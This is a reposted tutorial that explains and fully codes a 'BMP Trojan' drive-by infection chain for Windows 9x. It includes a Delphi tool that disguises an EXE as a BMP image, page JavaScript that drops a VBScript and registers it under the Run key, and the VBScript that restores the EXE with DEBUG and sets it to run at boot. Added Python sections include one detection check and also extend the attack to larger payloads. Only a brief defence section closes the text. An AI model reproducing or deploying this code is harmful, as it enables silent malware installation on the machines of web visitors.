Detailed description of BMP Trojan

Source: Internet
Author: User
Tags: bmp, image

First of all, this is nothing new, but some people said recently that they could not find the article, so I am posting it here; test it for yourself. What is a BMP web page Trojan? It is different from the older MIME-header Trojan. The MIME Trojan MIME-encodes an EXE into an EML (Outlook Express mail) file, places it on a web page, and abuses the IE and OE encoding vulnerability to download and execute it automatically.
A BMP Trojan works differently. The EXE is disguised as a BMP image so that IE downloads it into its cache on its own. A JavaScript on the page then writes a VBScript into the client's system directory and registers it under the HKCU Run key. At the next boot that script locates the Temporary Internet Files folder, finds the cached BMP, copies it to the temp directory, uses DEBUG to strip the BMP header and restore the EXE, and registers the EXE under the Run key so that it executes at the boot after that. The technique only works on Windows 9x; it does nothing on Windows 2000 or XP.

It sounds complicated, so let us take it step by step.
1) How to turn an EXE into a BMP.
Look up the BMP file format yourself. The BMP file header is 54 bytes long and, in short, records the width, height, bits per pixel, file size and pixel-data length of the image. All we need to do is prepend a suitable BMP header to the EXE (the values in that header must of course be consistent with the size of the EXE); IE will then download the "image" into its cache. We tried JPG first and found that if the header is wrong, IE does not download the file at all. The code is as follows:

program exe2bmp;

uses
  Windows,
  SysUtils;

var
  Len, Row, Col, FS: DWORD;
  Buffer: array[0..255] of Char;
  FD: WIN32_FIND_DATA;
  H, HW: THandle;

begin
  if (ParamStr(1) <> '') and (ParamStr(2) <> '') then begin // do nothing unless both parameters are given
    if FileExists(ParamStr(1)) then begin
      H := FindFirstFile(PChar(ParamStr(1)), FD);
      FindClose(H);
      FS := FD.nFileSizeLow;
      { Round the EXE size up to a multiple of 12 (one 24-bit pixel row of width 4,
        so no row padding is needed), then widen in steps of 4 until the image is
        no taller than it is wide. }
      Col := 4;
      while True do begin
        if (FS mod 12) = 0 then begin
          Len := FS;
        end else Len := FS + 12 - (FS mod 12);
        Row := Len div Col div 3;
        if Row > Col then begin
          Col := Col + 4;
        end else Break;
      end;
      FillChar(Buffer, 256, 0);
      {BMP file header data}
      Buffer[0] := 'B'; Buffer[1] := 'M';
      PDWORD(@Buffer[18])^ := Col;        // biWidth
      PDWORD(@Buffer[22])^ := Row;        // biHeight
      PDWORD(@Buffer[34])^ := Len;        // biSizeImage
      PDWORD(@Buffer[2])^ := Len + 54;    // bfSize
      PDWORD(@Buffer[10])^ := 54;         // bfOffBits: the "pixel data" (the EXE) starts right after the header
      PDWORD(@Buffer[14])^ := 40;         // biSize (BITMAPINFOHEADER)
      PWORD(@Buffer[26])^ := 1;           // biPlanes
      PWORD(@Buffer[28])^ := 24;          // biBitCount
      {Write file}
      HW := CreateFile(PChar(ParamStr(2)), GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, CREATE_ALWAYS, 0, 0);
      H := CreateFile(PChar(ParamStr(1)), GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
      WriteFile(HW, Buffer, 54, Col, nil);   // from here on Col is reused as the bytes-transferred variable
      repeat
        ReadFile(H, Buffer, 256, Col, nil);
        WriteFile(HW, Buffer, Col, Col, nil);
      until Col <> 256;
      WriteFile(HW, Buffer, Len - FS, Col, nil);  // pad to the declared image size
      CloseHandle(H);
      CloseHandle(HW);
    end;
  end;
end.

The code above compiles under Delphi 4, 5 and 6 into exe2bmp.exe. Open an MS-DOS prompt and type
exe2bmp myexe.exe mybmp.bmp
and press Enter: the EXE named by the first parameter is written out as the BMP named by the second.
The next step is to put this BMP on a web page. If you open the image you will find it is just a field of random colors, so it is best placed on the page where it is not visible.
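As an added example (this is not code from the original article), the same header construction in Python, together with the check a defender would run on a suspicious BMP: an uncompressed image never has an MZ header at bfOffBits whose e_lfanew lands on a PE signature, and biSizeImage should equal width * height * 3. The stand-in EXE is constructed inline (a DOS header, a PE signature and NOP filler); it is not a real program.

```python
import struct

HEADER_LEN = 54  # BITMAPFILEHEADER (14 bytes) + BITMAPINFOHEADER (40 bytes)


def bmp_dimensions(size):
    """Same search as exe2bmp: round the EXE size up to a multiple of 12
    (a 24-bit row of width 4 is exactly 12 bytes, so no row padding is
    needed), then widen in steps of 4 until the image is no taller than it
    is wide. Returns (width, height, padded_size)."""
    padded = size if size % 12 == 0 else size + 12 - size % 12
    width = 4
    while True:
        height = padded // width // 3
        if height > width:
            width += 4
        else:
            return width, height, padded


def exe2bmp(exe: bytes) -> bytes:
    """Prepend a 54-byte header; the EXE becomes the 'pixel data'."""
    width, height, padded = bmp_dimensions(len(exe))
    h = bytearray(HEADER_LEN)
    h[0:2] = b"BM"
    struct.pack_into("<I", h, 2, padded + HEADER_LEN)  # bfSize
    struct.pack_into("<I", h, 10, HEADER_LEN)          # bfOffBits: data right after the header
    struct.pack_into("<I", h, 14, 40)                  # biSize
    struct.pack_into("<i", h, 18, width)               # biWidth
    struct.pack_into("<i", h, 22, height)              # biHeight
    struct.pack_into("<H", h, 26, 1)                   # biPlanes
    struct.pack_into("<H", h, 28, 24)                  # biBitCount
    struct.pack_into("<I", h, 34, padded)              # biSizeImage
    return bytes(h) + exe + b"\0" * (padded - len(exe))


def find_embedded_pe(data: bytes):
    """Detection check: return the offset of an MZ header sitting exactly at
    bfOffBits whose e_lfanew points at a 'PE\\0\\0' signature, else None."""
    if len(data) < HEADER_LEN or data[:2] != b"BM":
        return None
    off = struct.unpack_from("<I", data, 10)[0]
    if off + 0x40 > len(data) or data[off:off + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    pe = off + e_lfanew
    if pe + 4 <= len(data) and data[pe:pe + 4] == b"PE\0\0":
        return off
    return None


def dimension_mismatch(data: bytes) -> bool:
    """Weaker signal: for an uncompressed image biSizeImage should equal the
    4-byte-aligned row size times the height. exe2bmp's width/height search
    often leaves these inconsistent."""
    width, height = struct.unpack_from("<ii", data, 18)
    bpp = struct.unpack_from("<H", data, 28)[0]
    size_image = struct.unpack_from("<I", data, 34)[0]
    row = (abs(width) * bpp // 8 + 3) & ~3
    return size_image != row * abs(height)


def fake_pe(size: int = 4096) -> bytes:
    """Constructed stand-in for an EXE (not a real program): DOS header with
    e_lfanew = 0x40, then the PE signature, then NOP filler."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    body = bytes(hdr) + b"PE\0\0"
    return body + b"\x90" * (size - len(body))


if __name__ == "__main__":
    bmp = exe2bmp(fake_pe())
    print(bmp_dimensions(4096), find_embedded_pe(bmp), dimension_mismatch(bmp))
```

For a 4096-byte EXE the search settles on a 40x34 image, which declares 4080 bytes of pixels against 4104 bytes actually stored, so even without the MZ check the header is internally inconsistent; a viewer shows it as noise, as the article says, and IE still caches it.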

The following is the script that goes on the web page.
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>');
// The applet is the Microsoft JVM ActiveX bridge, which is what provides the
// setCLSID / createInstance / GetObject calls used below.
function docsave()
{
  var a = document.applets[0];
  a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");   // WScript.Shell
  a.createInstance();
  var wsh = a.GetObject();
  a.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");   // Scripting.FileSystemObject
  a.createInstance();
  var fso = a.GetObject();
  var winsys = fso.GetSpecialFolder(1);                   // 1 = System folder
  var vbs = winsys + "\\s.vbs";
  // s.vbs runs at the next boot and deletes this Run entry itself
  wsh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs", "wscript \"" + vbs + "\"");
  var st = fso.CreateTextFile(vbs, true);
  st.WriteLine('Option Explicit');
  st.WriteLine('Dim fso, wsh, cache, str');
  st.WriteLine('Set fso = CreateObject("Scripting.FileSystemObject")');
  st.WriteLine('Set wsh = CreateObject("WScript.Shell")');
  st.WriteLine('cache = wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache")');
  st.WriteLine('wsh.RegDelete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs"');
  st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp", "tmp.exe"');
  st.WriteLine('SearchBmpFile fso.GetFolder(cache), "mybmp[1].bmp"');
  st.WriteLine('WScript.Quit');
  st.WriteLine('Sub SearchBmpFile(folder, fname)');
  st.WriteLine('  Dim subfolder, file, lt, tmp, winsys');
  st.WriteLine('  str = fso.GetParentFolderName(folder) & "\\" & folder.Name & "\\" & fname');
  st.WriteLine('  If fso.FileExists(str) Then');
  st.WriteLine('    tmp = fso.GetSpecialFolder(2) & "\\"');
  st.WriteLine('    winsys = fso.GetSpecialFolder(1) & "\\"');
  st.WriteLine('    Set file = fso.GetFile(str)');
  st.WriteLine('    file.Copy tmp & "tmp.dat"');
  st.WriteLine('    file.Delete');
  st.WriteLine('    Set lt = fso.CreateTextFile(tmp & "tmp.in")');
  st.WriteLine('    lt.WriteLine "rbx"');
  st.WriteLine('    lt.WriteLine "0"');
  st.WriteLine('    lt.WriteLine "rcx"');
  st.WriteLine('    lt.WriteLine "1000"');
  st.WriteLine('    lt.WriteLine "w136"');
  st.WriteLine('    lt.WriteLine "q"');
  st.WriteLine('    lt.Close');
  st.WriteLine('    wsh.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out", 0, True');
  st.WriteLine('    On Error Resume Next');
  st.WriteLine('    fso.GetFile(tmp & "tmp.dat").Copy winsys & "tmp.exe"');
  st.WriteLine('    fso.GetFile(tmp & "tmp.dat").Delete');
  st.WriteLine('    fso.GetFile(tmp & "tmp.in").Delete');
  st.WriteLine('    fso.GetFile(tmp & "tmp.out").Delete');
  st.WriteLine('  End If');
  st.WriteLine('  If folder.SubFolders.Count <> 0 Then');
  st.WriteLine('    For Each subfolder In folder.SubFolders');
  st.WriteLine('      SearchBmpFile subfolder, fname');
  st.WriteLine('    Next');
  st.WriteLine('  End If');
  st.WriteLine('End Sub');
  st.Close();
}
setTimeout("docsave()", 1000);

Save the script as "js.js" and include it in the web page with a SCRIPT tag whose src points at js.js.

This script writes an "s.vbs" file into the system directory of the client machine and registers it so that it runs automatically at the next boot. Its main job is to find the cached copy of the image in the Temporary Internet Files directory; IE stores cached files under a bracketed-index name, so the copy of mybmp.bmp is called mybmp[1].bmp.
The main content of the "s.vbs" file is as follows:

Option Explicit
Dim fso, wsh, cache, str
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsh = CreateObject("WScript.Shell")
' Location of the Temporary Internet Files folder on this machine
cache = wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
' Remove our own autostart entry and register the restored EXE instead
wsh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp", "tmp.exe"
SearchBmpFile fso.GetFolder(cache), "mybmp[1].bmp"
WScript.Quit
Sub SearchBmpFile(folder, fname)
  Dim subfolder, file, lt, tmp, winsys
  ' Look for the target BMP image in this cache folder
  str = fso.GetParentFolderName(folder) & "\" & folder.Name & "\" & fname
  If fso.FileExists(str) Then
    tmp = fso.GetSpecialFolder(2) & "\"     ' 2 = Temp folder
    winsys = fso.GetSpecialFolder(1) & "\"  ' 1 = System folder
    Set file = fso.GetFile(str)
    file.Copy tmp & "tmp.dat"
    file.Delete
    ' Generate the DEBUG script
    Set lt = fso.CreateTextFile(tmp & "tmp.in")
    lt.WriteLine "rbx"
    lt.WriteLine "0"
    lt.WriteLine "rcx"
    ' The 1000 below is hexadecimal (4096 decimal) and must be the size of your EXE;
    ' for an EXE over 64 KB put the high 16 bits of the size into BX.
    lt.WriteLine "1000"
    ' DEBUG loads tmp.dat at 100h, so 136h is 54 bytes in, just past the BMP header
    lt.WriteLine "w136"
    lt.WriteLine "q"
    lt.Close
    ' Run DEBUG hidden and wait for it to finish before copying the result
    wsh.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out", 0, True
    On Error Resume Next
    fso.GetFile(tmp & "tmp.dat").Copy winsys & "tmp.exe"
    fso.GetFile(tmp & "tmp.dat").Delete
    fso.GetFile(tmp & "tmp.in").Delete
    fso.GetFile(tmp & "tmp.out").Delete
  End If
  If folder.SubFolders.Count <> 0 Then
    For Each subfolder In folder.SubFolders
      SearchBmpFile subfolder, fname
    Next
  End If
End Sub

This script searches the Temporary Internet Files folder and its subfolders for the BMP, copies it to the temp directory as tmp.dat, and generates a DEBUG script. DEBUG loads tmp.dat at offset 100h, so the W command at 136h writes the specified number of bytes (CX, or BX:CX for larger files) starting 54 bytes into the file, i.e. just past the BMP header, back over tmp.dat. The script then copies the restored file to the system directory as tmp.exe, and the Run entry executes it at the next restart. That is the basic implementation of a BMP Trojan.
For detailed script code, see http://hotsky.363.net
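Added example, not code from the original article: the DEBUG script written out for the real EXE size instead of the hard-coded 1000h, with BX carrying the high 16 bits so that files over 64 KB are also restored in full, plus a small model of the three DEBUG commands the script uses so the restore can be checked offline (the real DEBUG additionally has to fit the whole file into conventional memory). The wrapped BMP is constructed inline with only the header field the restore depends on.

```python
import struct

LOAD_ADDR = 0x100   # DEBUG loads a file at CS:0100
HEADER_LEN = 54     # BMP header to skip: 0x100 + 0x36 = 0x136


def debug_script(exe_size: int) -> str:
    """tmp.in for DEBUG. The page hard-codes 'rcx 1000' (4096 bytes); this
    derives the length from the real size and sets BX, the high word of the
    byte count the W command uses, so EXEs over 64 KB are written completely."""
    if not 0 < exe_size < 2 ** 32:
        raise ValueError("size must fit in BX:CX")
    bx, cx = divmod(exe_size, 0x10000)
    return "\n".join(["rbx", f"{bx:x}", "rcx", f"{cx:x}",
                      f"w {LOAD_ADDR + HEADER_LEN:x}", "q", ""])


def emulate_debug(file_image: bytes, script: str) -> bytes:
    """Model of the DEBUG commands used here: 'rbx'/'rcx' take the new hex
    value on the following line; 'w addr' writes BX:CX bytes starting at
    addr back to the file DEBUG was started with. Returns the written file."""
    regs = {"bx": 0, "cx": 0}
    written = None
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        cmd = lines[i].strip().lower()
        if cmd in ("rbx", "rcx"):
            regs[cmd[1:]] = int(lines[i + 1], 16)
            i += 2
            continue
        if cmd.startswith("w"):
            addr = int(cmd[1:].strip(), 16)
            length = (regs["bx"] << 16) | regs["cx"]
            start = addr - LOAD_ADDR
            written = file_image[start:start + length]
        i += 1
    if written is None:
        raise ValueError("script never wrote the file")
    return written


def wrapped_bmp(payload: bytes) -> bytes:
    """Constructed sample of what exe2bmp leaves in the IE cache: a 54-byte
    header with only bfOffBits filled in, the payload, and the zero padding
    exe2bmp appends to reach a multiple of 12 bytes."""
    header = bytearray(HEADER_LEN)
    header[:2] = b"BM"
    struct.pack_into("<I", header, 10, HEADER_LEN)
    pad = (-len(payload)) % 12
    return bytes(header) + payload + b"\0" * pad


if __name__ == "__main__":
    payload = b"MZ" + b"\x90" * 4094          # constructed 4096-byte stand-in for an EXE
    print(debug_script(len(payload)))
    print(emulate_debug(wrapped_bmp(payload), debug_script(len(payload))) == payload)
```

Because the hard-coded count is what decides how many bytes DEBUG writes back, a mismatch between it and the real EXE size is the usual reason a restored tmp.exe fails to run; generating the script from the size, as above, removes that failure mode.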

Defense methods:
The simplest measure is to delete or rename wscript.exe and debug.exe: the chain needs Windows Scripting Host to run s.vbs and DEBUG to restore the EXE, so removing either one breaks it.
Install a working anti-virus product, since many of these scripts are already detected.
If you can, install Windows 2000 with SP3, and avoid visiting unknown websites.
